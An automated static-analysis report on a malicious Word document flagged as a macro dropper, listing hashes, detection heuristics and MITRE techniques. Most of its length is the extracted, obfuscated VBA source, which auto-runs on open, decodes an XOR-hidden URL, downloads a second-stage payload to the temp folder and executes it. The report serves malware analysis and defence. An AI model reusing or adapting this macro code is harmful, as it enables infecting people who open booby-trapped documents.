Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e2c4163b16258ea8…

MALICIOUS

Office (OLE)

Size: 58.5 KB
Created: 2015-01-19 16:07:00
Authoring application: Microsoft Office Word
First seen: 2015-04-15
MD5: 14c2795bcc35c3180649494ec2bc7877
SHA-1: 95c66d17305a28af956dd2cf21ee037a2d573bf0
SHA-256: e2c4163b16258ea8719d39be8ac30b9020fcfb6616f70fefcc4471b6318d0ce4
Risk Score: 188

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File)

The sample contains VBA macros with an autoopen subroutine that calls other functions. Heuristics flag a CreateObject call and auto-execution tokens in the compiled p-code, suggesting the macro is designed to download and execute a payload. The ClamAV detection name 'Doc.Dropper.Agent' further supports this dropper functionality. The script declares and calls functions from wininet.dll, commonly used for network operations, to fetch a second-stage payload that is then executed.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-1567328 (severity: critical, id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-1567328
  • VBA macros detected (severity: medium, id: OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • CreateObject call (severity: high, id: OLE_VBA_CREATEOBJ)
    Matched line in script: Set C21C21C21 = CreateObject(C22C22C22)
  • VBA p-code auto-exec with execution tokens (severity: high, id: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so that visible source is unavailable.
  • AutoOpen macro (severity: low, id: OLE_VBA_AUTOOPEN)
    Matched line in script: Sub autoopen()
  • Legacy WordBasic auto-exec macro marker (severity: medium, id: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6938 bytes
SHA-256: 6001940aabb740c457d7e7251caafc9522419b13d16acdfa10a81b1b28336fa1
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub InIn()
CALTHA
End Sub

Sub autoopen()
InIn
End Sub


Attribute VB_Name = "FILE6"

Option Explicit
Public Const C1C1C1A = "BRITTANY"

#If VBA7 And Win64 Then
Public _
Declare _
PtrSafe _
Function _
C1C1C1 Lib _
"wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long
Public _
Declare _
PtrSafe _
Function _
C2C2C2 Lib _
"wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr
Public _
Declare _
PtrSafe _
Function _
C3C3C3 Lib _
"wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
Public _
Declare _
PtrSafe _
Function _
C4C4C4 Lib _
"wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr
#Else
Public Declare Function C1C1C1 Lib "wininet.dll" _
Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long
Public Declare Function C2C2C2 Lib "wininet.dll" _
Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long
Public Declare Function C3C3C3 Lib "wininet.dll" _
Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
Public Declare Function C4C4C4 Lib "wininet.dll" _
Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long
#End If



Private Const BRANDI = 8162
Private Const BRANDY As String = "HAZ"
Private Const BREANA = 1
Private Const BREDA = &H4000000

Public Function C16C16C16 _
(ByVal BREE As String) As Boolean
    #If VBA7 _
    And Win64 Then
        Dim BRETT As LongPtr, BRIANNA As LongPtr
    #Else
        Dim BRETT As Long, BRIANNA As Long
    #End If
    Dim BRIAR As Long
    Dim C33C33C33 As String * BRANDI, BRIELLE As String
    Dim BRIER As Integer, BRIONY As Double
    BRETT = C2C2C2(BRANDY, BREANA, vbNullString, vbNullString, 0)
    If BRETT = 0 Then
        Exit Function
    End If
    Dim FiGaMan As Boolean
    
    If BRITANNIA(BRIANNA, BRETT) Then
    End If
    If BRIANNA = 0 Then
        BRIONY = 0
    Else
        C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
        BRIELLE = C33C33C33
        Do While BRIAR <> 0
            C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
            
            Dim BRITT As Long
For BRITT = 6 To 8
If BRITT = 38 Then End
Next BRITT
            
            BRIELLE = BRIELLE + Mid(C33C33C33, 1, BRIAR)
        Loop
            BRIONY = Len(BRIELLE): BRIER = FreeFile
        Open BREE _
            For Binary Access Write _
        Lock Write _
        As #BRIER
        Put #BRIER, _
                , BRIELLE
        Dim BRITTA As Double
            For BRITTA = 2 To 3
    If BRITTA = 37 Then End
Next BRITTA
        Close #BRIER
    End If
    C1C1C1 BRIANNA
    C1C1C1 BRETT
    BRIELLE = ""
    If BRIONY Then
        C16C16C16 = True
    End If
End Function


Public Function CANDICE(CANDIDA As String) As Integer
CANDICE = Len(CANDIDA)
End Function


Attribute VB_Name = "PIDLE0"



Public Function C8C8C8(CAMERON As String, CAMILLA As String) As String
    
    Dim CAMILLE As Integer
    Dim CAMMIE As Integer
    
    
    Dim CAMRYN As Double
For CAMRYN = 1 To 3
If CAMRYN = 32 Then End
Next CAMRYN
    
    Dim CANDACE As Long
    Dim CANDI As String
    For CANDACE = 1 _
    To _
    ( _
    CANDICE _
    (CAMILLA) _
    / 2)
        CAMILLE = Val("&H" & _
        (Mid$(CAMILLA, _
        (2 * CANDACE) - 1, 2)))
        CAMMIE = Asc(Mid$(CAMERON, _
        ((CANDACE Mod Len(CAMERON)) + 1), 1))
        CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
    Next CANDACE
   C8C8C8 = CANDI
End Function



Public Function C21C21C21() As Object
Dim C22C22C22 As String
C22C22C22 = C8C8C8(C9C9C9, C10C10C10)
Set C21C21C21 = CreateObject(C22C22C22)
End Function


Sub CALTHA()
        Dim CAMELLIA As Long

    Dim CANDIS As Double
For CANDIS = 44 To 46
If CANDIS = 32 Then End
Next CANDIS
CAMELLIA = 89
CALANTHA (CAMELLIA)

End Sub

Attribute VB_Name = "IDL4"


Public Const C18C18C18 = "675B26585F6D754333585A2055472A5B5D"
Public Const C19C19C19 = "6850770C1D264C56"
Public Const C20C20C20 = "5C473744096C1B553947456D50566C05026C0403771A563B51"
Public Const C10C10C10 = "6750315D43375D5D241A752A5856104D4037515E0C5659265747"
Public Const C9C9C9 = "C43C43C43C43C43C43C43C43C43C43"


Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
If CAILEIGH.FileExists(CAILYN) Then
CADY = True
Else
CADY = False
End If
End Function
#If VBA7 _
    And Win64 Then
       Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
    #Else
       Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
    #End If
Dim CALLIDORA As String
    CALLIDORA = C8C8C8(C9C9C9, C20C20C20)
    
                CALIDA _
    = C4C4C4 _
    ( _
    CALLA, _
    CALLIDORA, vbNullString, _
    0, _
    BREDA, 0)
    BRITANNIA = True
End Function



Attribute VB_Name = "M"


Public Function C5C5C5(ByRef C23C23C23 As Object) As Object
Set C5C5C5 = C23C23C23.GetSpecialFolder(2)
End Function
Sub CALANTHA(CALEIGH As Long)

C25C25C25 ("CACACARDRDRDRD")
End Sub


Public Function C25C25C25(C24C24C24 As String)
C6C6C6
End Function

Public Function C6C6C6()

Dim C7C7C7  As Object
Set C7C7C7 = C21C21C21
Dim C11C11C11 As Object
Set C11C11C11 = C5C5C5(C7C7C7)

Dim C15C15C15
Dim C12C12C12
C12C12C12 = C8C8C8(C9C9C9, C19C19C19)
C15C15C15 = C11C11C11 & C12C12C12


If CADY(C7C7C7, C15C15C15) Then
C7C7C7. _
DeleteFile C15C15C15
End If
If C16C16C16(C15C15C15) Then
End If
If CADY(C7C7C7, C15C15C15) Then
End If
Dim C17C17C17
Set C17C17C17 = CreateObject _
(C8C8C8 _
(C9C9C9, C18C18C18))
C17C17C17.Open C15C15C15
End Function



Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A0FA2F83-71AF-4C12-BBBE-E1E416CF7585}{98E7490C-49E9-46A2-A122-3876EAF034E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False